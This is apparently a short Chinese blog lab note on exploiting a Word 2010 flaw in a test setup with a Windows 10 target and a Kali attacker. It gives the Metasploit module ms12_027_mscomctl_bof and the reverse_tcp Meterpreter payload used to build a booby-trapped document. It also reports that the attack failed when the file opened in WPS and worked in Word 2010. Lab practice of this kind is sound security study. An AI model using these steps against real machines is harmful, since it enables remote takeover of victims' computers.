环境
靶机:win10
攻击机:kali 2.0
软件版本:word office 2010 破解版 64位
use windows/fileformat/ms12_027_mscomctl_bof
set payload windows/meterpreter/reverse_tcp
直接生成了一个带毒文档。把文档发送到靶机上。
然后设置监听
最后在靶机上打开文档。
还是跟上一次结果一样,未成功反弹shell。
实验未成功,错在我默认打开doc文档是用wps。用wordoffice2010 打开后正常。
网友评论